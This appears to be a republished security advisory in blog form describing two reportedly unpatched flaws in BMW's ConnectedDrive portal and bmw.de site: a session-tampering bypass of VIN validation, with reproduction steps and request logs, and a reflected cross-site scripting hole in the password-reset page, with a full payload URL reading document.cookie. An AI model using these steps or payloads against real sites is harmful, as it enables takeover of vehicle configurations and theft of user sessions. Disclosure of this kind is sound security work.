BMW Core Web Portal & ConnectedDrive - Exploitation of Car Configurations

Editorial_Staff_Team's picture

BMW Core Web Portal & ConnectedDrive vulnerable

Today we will talk about  two vulnerabilities that was discovered by Vulnerability Laboratory core team member "Benjamin Kunz Mejri", the vulnerabilities which are not patched yet! There are two main bugs both related to the BMW online service and web app for ConnectedDrive .

The first vulnerability found in the BMW ConnectedDrive web-application. The vulnerability allows remote attackers to manipulate specific configured parameters to compromise the affected web-application service. A vehicle identification number,commonly abbreviated to VIN, or chassis number, is a unique code including a serial number, used by the automotive industry to identify individual motor vehicles, towed vehicles, motorcycles, scooters and mopeds as defined in ISO 3833.

The vulnerability is located in the session management of the VIN adding procedure. Remote attackers are able to bypass the secure validation approval of the VIN when processing to create it. Remote attackers are able to change with a live session tamper the action information to create or update. Thus allows an attacker to bypass the invalid VIN exception to add a new configuration finally. Thus interaction results in the takeover of other vehicle identification numbers to view or manipulate the configuration. The session validation flaw can be exploited with a low-privilege user account, leading to manipulation of VIN numbers and configuration settings such as compromising registered and valid VIN numbers through the ConnectedDrive portal. The settings available through the ConnectedDrive portal include the ability to lock/unlock the vehicle, manage song playlists, access email accounts, manage routes, get real-time traffic information, and so on.

After the successful exploitation to integrate the vin in the portal the attacker can login with the connectedrive ios application. The attacker includes the illegal vin to his account via portal and can access the configuration via mobile application or portal. Thus way an attacker is able to unauthorized access the info-tainment-system of bmw cars to interact without hardware manipulation or cable access.

Affected Module(s)

VIN - Konfiguration to Add/remove Vehicle

Proof of Concept 

Manual steps to reproduce the vulnerability ...

1. Open the web-application of bmw connecteddrive (https://www.bmw-connecteddrive.co.uk/cdp/) and login
2. Surf to the My Settings module of the service
3. Start the session tamper and include a new random VIN
4. Save the requesst and manipulate in the session tamper the add value to create

5. Continue to process the GET request after it
6. Now, the module opens and the restriction with the vehicle Identification Number approval is bypassed
7. Now you can add your own VIN to the interface to create another car with the same VIN

--- PoC Session Logs [GET] ---
Status: 200[OK]
Größe des Inhalts[162022]
Mime Type[image/png]
   Request Header:
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Cookie[locale=en_GB; CookieDisclaimer=true; JSESSIONID=41144e45b60522b8dd926dc6a46f.1]
      Connection[keep-alive]
   Response Header:
      Date[Thu, 18 Feb 2016 11:10:23 GMT]
      Expires[Thu, 18 Feb 2016 11:11:23 GMT]
      Cache-Control[PUBLIC, max-age=60]
      Content-Type[image/png]
      Content-Length[162022]
      Set-Cookie[locale=en_GB; Expires=Fri, 17-Feb-2017 11:10:23 GMT
JSESSIONID=41144e45b60522b8dd926dc6a46f.1; Path=/cdp/release/internet; Secure; HttpOnly]
      Keep-Alive[timeout=5, max=98]
      Connection[Keep-Alive]
-
Status: 200[OK]
Größe des Inhalts[-1]
Mime Type[text/html]
   Request Header:
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Cookie[locale=en_GB; CookieDisclaimer=true; JSESSIONID=41144e45b60522b8dd926dc6a46f.1]
      Connection[keep-alive]
   POST-Daten:
      action[create]
      vin[]
      licenseplate[1337+%3B%29]
      activMethod[agreement]
      agb[View]
   Response Header:
      Date[Thu, 18 Feb 2016 11:10:40 GMT]
      Content-Type[text/html;charset=UTF-8]
      Set-Cookie[locale=en_GB; Expires=Fri, 17-Feb-2017 11:10:40 GMT
JSESSIONID=41144e45b60522b8dd926dc6a46f.1; Path=/cdp/release/internet; Secure; HttpOnly]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]

The second vulnerability is a cross-site scripting vulnerability the researchers discovered client-side on the BMW web domain in the password reset token system. The researchers call the problem a "classic" cross-site scripting vulnerability, as the security flaw does not need privileged user accounts to be exploited; instead, "low user interaction" is needed through only a payload injection into the vulnerable module.[ ./de/publicPools/landingPages/ ] 

The vulnerability is located in the `t` value (token) of the `passwordResetOk.html` web-application file. Remote attackers are able to inject own client-side script codes to the `passwordResetOk.html` file. the request method to inject is GET and the vulnerability is located on the client-side of the affected bmw web-service. The attacker injects the payload after the secure token to execute the context in the passwordResetOk.html file.

Proof of Concept 
 
PoC: Payload
https://www.bmw.de/de/publicPools/landingPages/passwordResetOk.html?t=OiWU9ARpVXDXDjlRJ3tS6XxgnOvkFzRK%22%3E%3C[CLIENT SIDE SCRIPT CODE INJECT!]iframe%20src=a%20onload=alert%28document.cookie%29%20%3C
 
PoC: Source - resetpasswordMain (t=)
<div class="resetpasswordMain">
    <div class="resetpasswordHeadlineContent resetpasswordContent">   
      <div class="headline parbase headlineColor base resetpasswordMainHeadline">
<h1 id="HeadlineColord8dcc58d2d76c0583906abb15bd57c27" class="headlineNormal headlineDarkGrey ">Ihr neues Passwort für Mein BMW.</h1></div>  
      <div class="headline resetpasswordMainSubheadline parbase headlineColor base">
<h3 id="HeadlineColora3be466af12d8b02db081f15ddf8c61f" class="headlineNormal headlineDarkGrey ">Legen Sie hier Ihr neues Passwort fest.</h3></div>
    </div>
    <fieldset class="copyText resetpasswordFields componentSetFormInputArea">
      <input id="Passwordreset4041967ae0273887df5ec8cd5adcc2c5token" 
value="OiWU9ARpVXDXDjlRJ3tS6XxgnOvkFzRK" type="hidden">[CLIENT SIDE SCRIPT CODE EXECUTION!]<iframe src="a" onload="alert(document.cookie)" <"="">
      <div class="componentSetEditAreaNewRow">
        <label for="Passwordreset4041967ae0273887df5ec8cd5adcc2c5password" class="componentSetFormInputLabel">Neues Passwort*</label><input type="password" 
        class="componentSetInputTxt  componentSetHasRightInfoIcon  password required" id="Passwordreset4041967ae0273887df5ec8cd5adcc2c5password" 
name="passwordResetPassword"/><span class="myBMW-tooltip"><div class="tooltipComp"><div class="componentSetInstantCheck"><div class="parbase base instantCheck">
<div class="instant-check">
    <p class="headline">Ihr Passwort muss die folgenden Bestandteile haben:</p>
    <ul>
        <li class="length">Mindestens 8 Zeichen</li>
        <li class="minimum">Mindestens 2 dieser 3 Gruppen</li>
        <li class="no-list">
            <ul class ="innerul">
                <li class="letters">Buchstaben<br/>(abc = ABC, nicht ÄÖÜ)</li>
                <li class="numbers">Ziffern</li>
                <li class="specials">Sonderzeichen<br/>,.+-()@:;*</li>
            </ul>
        </li>
    </ul>
</div></div>
</div></div>
 
 
 
 
Reference(s) : 
 
Rate this article: 
Average: 4.4 (9 votes)

Comments

Ali's picture

hello I realy like this post thank you very much for sharing us.Ali

John Marsh's picture

I love BMW car, but my mom gives me another car as gift. I like that as well. but thanks remind me BMWs configurations and features.

Montex Luis's picture

BMW is one of the most iconic cars in the world.

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.